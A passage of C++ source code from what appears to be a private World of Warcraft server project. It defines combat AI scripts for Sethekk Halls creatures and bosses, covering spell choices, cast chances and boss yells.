_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// Time-Lost Scryer AI
#define CN_TIME_LOST_SCRYER 20697
#define FLASH_HEAL 38588 // let's try this one
#define ARCANE_MISSILES 35034 // and those: 35033, 35034 // doesn't work somehow
class TIMELOSTSCRYERAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(TIMELOSTSCRYERAI);
SP_AI_Spell spells[2];
bool m_spellcheck[2];
TIMELOSTSCRYERAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 2;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(FLASH_HEAL);
spells[0].targettype = TARGET_SELF;
spells[0].instant = true;
spells[0].perctrigger = 5.0f;
spells[0].attackstoptimer = 1000;
spells[1].info = sSpellStore.LookupEntry(ARCANE_MISSILES);
spells[1].targettype = TARGET_ATTACKING;
spells[1].instant = false;
spells[1].perctrigger = 12.0f;
spells[1].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// Time-Lost Shadowmage AI
#define CN_TIME_LOST_SHADOWMAGE 20698
#define CURSE_OF_THE_DARK_TALON 32682
class TIMELOSTSHADOWMAGEAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(TIMELOSTSHADOWMAGEAI);
SP_AI_Spell spells[1];
bool m_spellcheck[1];
TIMELOSTSHADOWMAGEAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 1;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(CURSE_OF_THE_DARK_TALON);
spells[0].targettype = TARGET_ATTACKING;
spells[0].instant = false;
spells[0].perctrigger = 10.0f;
spells[0].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// Sethekk Guard AI
#define CN_SETHEKK_GUARD 18323
#define THUNDERCLAP 36214
#define SUNDER_ARMOR 30901 // 1000 arm per use (to 5 uses!) O_O
class SETHEKKGUARDAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(SETHEKKGUARDAI);
SP_AI_Spell spells[2];
bool m_spellcheck[2];
SETHEKKGUARDAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 2;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(THUNDERCLAP);
spells[0].targettype = TARGET_VARIOUS;
spells[0].instant = true;
spells[0].perctrigger = 12.0f;
spells[0].attackstoptimer = 1000;
spells[1].info = sSpellStore.LookupEntry(SUNDER_ARMOR);
spells[1].targettype = TARGET_ATTACKING;
spells[1].instant = true;
spells[1].perctrigger = 8.0f;
spells[1].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// Sethekk Initiate AI
#define CN_SETHEKK_INITIATE 18318
#define MAGIC_REFLECTION 20223 // 20223 or 20619
class SETHEKKINITIATEAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(SETHEKKINITIATEAI);
SP_AI_Spell spells[1];
bool m_spellcheck[1];
SETHEKKINITIATEAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 1;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(MAGIC_REFLECTION);
spells[0].targettype = TARGET_SELF;
spells[0].instant = true;
spells[0].perctrigger = 10.0f;
spells[0].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// Sethekk Oracle AI
#define CN_SETHEKK_ORACLE 18328
#define FAERIE_FIRE 21670 // 20656 or 21670 or 32129 or other
#define ARCANE_LIGHTNING 38146 // 38146, 32690 or 38634
class SETHEKKORACLEAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(SETHEKKORACLEAI);
SP_AI_Spell spells[2];
bool m_spellcheck[2];
SETHEKKORACLEAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 2;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(FAERIE_FIRE);
spells[0].targettype = TARGET_ATTACKING;
spells[0].instant = true;
spells[0].perctrigger = 8.0f;
spells[0].attackstoptimer = 1000;
spells[1].info = sSpellStore.LookupEntry(ARCANE_LIGHTNING);
spells[1].targettype = TARGET_ATTACKING;
spells[1].instant = false;
spells[1].perctrigger = 15.0f;
spells[1].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// Sethekk Prophet AI
#define CN_SETHEKK_PROPHET 18325
#define FEAR 32241 // Should it be aoe or normal? // damn it fears caster too
//#define // Ghost spawning similar to those in Sunken Temple
class SETHEKKPROPHETAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(SETHEKKPROPHETAI);
SP_AI_Spell spells[1];
bool m_spellcheck[1];
SETHEKKPROPHETAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 1;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(FEAR);
spells[0].targettype = TARGET_ATTACKING;
spells[0].instant = true;
spells[0].perctrigger = 8.0f;
spells[0].attackstoptimer = 1000;
/*
spells[1].info = sSpellStore.LookupEntry();
spells[1].targettype = TARGET_;
spells[1].instant = true;
spells[1].perctrigger = 0.0f;
spells[1].attackstoptimer = 1000;
*/
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// Sethekk Ravenguard AI
#define CN_SETHEKK_RAVENGUARD 18322
#define BLOODTHIRST 31996 // check also spells like this: 31996 and this: 35948
#define HOWLING_SCREECH 32651
class SETHEKKRAVENGUARDAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(SETHEKKRAVENGUARDAI);
SP_AI_Spell spells[2];
bool m_spellcheck[2];
SETHEKKRAVENGUARDAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 2;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(BLOODTHIRST);
spells[0].targettype = TARGET_ATTACKING; //?
spells[0].instant = true;
spells[0].perctrigger = 10.0f;
spells[0].attackstoptimer = 1000;
spells[1].info = sSpellStore.LookupEntry(HOWLING_SCREECH);
spells[1].targettype = TARGET_VARIOUS;
spells[1].instant = true;
spells[1].perctrigger = 8.0f;
spells[1].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// Sethekk Shaman AI
#define CN_SETHEKK_SHAMAN 18326
#define SUMMON_DARK_VORTEX 32663 //SUMMON_VOIDWALKER 30208 // Shouldn't be Dark Vortex (spell id: 32663) ?
class SETHEKKSHAMANAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(SETHEKKSHAMANAI);
SP_AI_Spell spells[1];
bool m_spellcheck[1];
SETHEKKSHAMANAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 1;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(SUMMON_DARK_VORTEX);
spells[0].targettype = TARGET_SELF;
spells[0].instant = true;
spells[0].perctrigger = 8.0f;
spells[0].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// Sethekk Talon Lord AI
#define CN_SETHEKK_TALON_LORD 18321
#define TALON_OF_JUSTICE 32654 // 32654 or 39229
#define AVENGERS_SHIELD 32774 // On WoWWiki is Shield of Revenge, but that should be it. Also spells that can be: 32774, 32674, 37554
class SETHEKKTALONLORDAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(SETHEKKTALONLORDAI);
SP_AI_Spell spells[2];
bool m_spellcheck[2];
SETHEKKTALONLORDAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 2;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(TALON_OF_JUSTICE);
spells[0].targettype = TARGET_ATTACKING;
spells[0].instant = true;
spells[0].perctrigger = 10.0f;
spells[0].attackstoptimer = 1000;
spells[1].info = sSpellStore.LookupEntry(AVENGERS_SHIELD);
spells[1].targettype = TARGET_ATTACKING;
spells[1].instant = true;
spells[1].perctrigger = 7.0f;
spells[1].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
Unit *target;
int nrspells;
};
/*****************************/
/* */
/* Boss AIs */
/* */
/*****************************/
// Darkweaver SythAI
#define CN_DARKWEAVER_SYTH 18472
// Spells
#define FROST_SHOCK 25464 // Workaround as this is player spell, but with proly same effect. (lower dmg - 37865, higher dmg - 37332)
#define FLAME_SHOCK 34354 // To small dmg, need to find better one
#define SHADOW_SHOCK 30138 // SELF IN DESCR. ?_? I think more accurate can be found (but this is quiet good)
#define ARCANE_SHOCK 33175 // I think better can be found, but still it's good
#define CHAIN_LIGHTNING 33643 // Couldn't find more info about this spell?
// Summons
#define SUMMON_SYTH_FIRE_ELEMENTAL 33537 //needs more core support, but those are correct ids!
#define SUMMON_SYTH_FROST_ELEMENTAL 33539
#define SUMMON_SYTH_ARCANE_ELEMENTAL 33538
#define SUMMON_SYTH_SHADOW_ELEMENTAL 33540
class DARKWEAVERSYTHAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(DARKWEAVERSYTHAI);
SP_AI_Spell spells[9];
bool m_spellcheck[9];
DARKWEAVERSYTHAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
SUMMON_LIMITER = 1;
nrspells = 9;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(FROST_SHOCK);
spells[0].targettype = TARGET_ATTACKING;
spells[0].instant = true;
spells[0].perctrigger = 9.0f;
spells[0].attackstoptimer = 1000;
spells[1].info = sSpellStore.LookupEntry(FLAME_SHOCK);
spells[1].targettype = TARGET_ATTACKING;
spells[1].instant = true;
spells[1].perctrigger = 9.0f;
spells[1].attackstoptimer = 1000;
spells[2].info = sSpellStore.LookupEntry(SHADOW_SHOCK);
spells[2].targettype = TARGET_ATTACKING;
spells[2].instant = true;
spells[2].perctrigger = 9.0f;
spells[2].attackstoptimer = 1000;
spells[3].info = sSpellStore.LookupEntry(ARCANE_SHOCK);
spells[3].targettype = TARGET_ATTACKING;
spells[3].instant = true;
spells[3].perctrigger = 9.0f;
spells[3].attackstoptimer = 1000;
spells[4].info = sSpellStore.LookupEntry(CHAIN_LIGHTNING);
spells[4].targettype = TARGET_ATTACKING;
spells[4].instant = true;
spells[4].perctrigger = 15.0f;
spells[4].attackstoptimer = 1000;
spells[5].info = sSpellStore.LookupEntry(SUMMON_SYTH_FIRE_ELEMENTAL);
spells[5].targettype = TARGET_SELF;
spells[5].instant = true;
spells[5].perctrigger = 0.0f;
spells[5].attackstoptimer = 1000;
spells[6].info = sSpellStore.LookupEntry(SUMMON_SYTH_FROST_ELEMENTAL);
spells[6].targettype = TARGET_SELF;
spells[6].instant = true;
spells[6].perctrigger = 0.0f;
spells[6].attackstoptimer = 1000;
spells[7].info = sSpellStore.LookupEntry(SUMMON_SYTH_ARCANE_ELEMENTAL);
spells[7].targettype = TARGET_SELF;
spells[7].instant = true;
spells[7].perctrigger = 0.0f;
spells[7].attackstoptimer = 1000;
spells[8].info = sSpellStore.LookupEntry(SUMMON_SYTH_SHADOW_ELEMENTAL);
spells[8].targettype = TARGET_SELF;
spells[8].instant = true;
spells[8].perctrigger = 0.0f;
spells[8].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
SUMMON_LIMITER = 1;
int RandomSpeach;
sRand.randInt(1000);
RandomSpeach=rand()%3;
switch (RandomSpeach)
{
case 0:
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "Time to... make my move!"); // needs corrections
_unit->PlaySoundToSet(10503);
break;
case 1:
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "Nice pets, yes!"); // corrections needed!
_unit->PlaySoundToSet(10504);
break;
case 2:
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "Nice pets have... weapons, not so... nice!");
_unit->PlaySoundToSet(10505);
break;
}
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnTargetDied(Unit* mTarget)
{
if (_unit->GetHealthPct() > 0) // Hack to prevent double yelling (OnDied and OnTargetDied when creature is dying)
{
int RandomSpeach;
sRand.randInt(1000);
RandomSpeach=rand()%2;
switch (RandomSpeach)
{
case 0:
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "Yes! Fleeting life is..."); // need to add it
_unit->PlaySoundToSet(10506);
break;
case 1:
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "Be free!"); // corrections needed!!
_unit->PlaySoundToSet(10507);
break;
}
}
}
void OnCombatStop(Unit *mTarget)
{
SUMMON_LIMITER = 1;
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
SUMMON_LIMITER = 1;
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "No more life, no more pain!"); // It's talking so <censored>
_unit->PlaySoundToSet(10508);
RemoveAIUpdateEvent();
}
void AIUpdate()
{
if ((_unit->GetHealthPct() <= 75 && SUMMON_LIMITER == 1) || (_unit->GetHealthPct() <= 50 && SUMMON_LIMITER == 2) || (_unit->GetHealthPct() <= 25 && SUMMON_LIMITER == 3))
{
SummonElementalWave();
}
else
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
}
void SummonElementalWave()
{
_unit->CastSpell(_unit, spells[5].info, spells[5].instant);
_unit->CastSpell(_unit, spells[6].info, spells[6].instant);
_unit->CastSpell(_unit, spells[7].info, spells[7].instant);
_unit->CastSpell(_unit, spells[8].info, spells[8].instant);
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "I have pets... of my own"); // It's talking so <doublecensored> -.-'
_unit->PlaySoundToSet(10502);
SUMMON_LIMITER += 1;
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
if (spells[i].speech != "")
{
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, spells[i].speech.c_str());
_unit->PlaySoundToSet(spells[i].soundid);
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
uint32 SUMMON_LIMITER;
int nrspells;
};
// Talon King IkissAI
#define CN_TALON_KING_IKISS 18473
#define ARCANE_VOLLEY 37078 // maybe should be: 37078 or other
#define ARCANE_EXPLOSION 38197 // bit too high dmg, but should work nearly in the same way
#define BLINK 38642 // Should be to random character, also can be: 38642, 29883, 38932, 36718, // doesn't work, because of lack features in core
#define POLYMORPH 38245 // worth to try also: 38245, 38896
#define MANA_SHIELD 38151 // also: 35064, 38151
class TALONKINGIKISSAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(TALONKINGIKISSAI);
SP_AI_Spell spells[5];
bool m_spellcheck[5];
TALONKINGIKISSAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 5;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(ARCANE_VOLLEY);
spells[0].targettype = TARGET_VARIOUS;
spells[0].instant = false;
spells[0].perctrigger = 15.0f;
spells[0].attackstoptimer = 1000;
spells[1].info = sSpellStore.LookupEntry(ARCANE_EXPLOSION);
spells[1].targettype = TARGET_VARIOUS;
spells[1].instant = false;
spells[1].perctrigger = 8.0f;
spells[1].attackstoptimer = 1000;
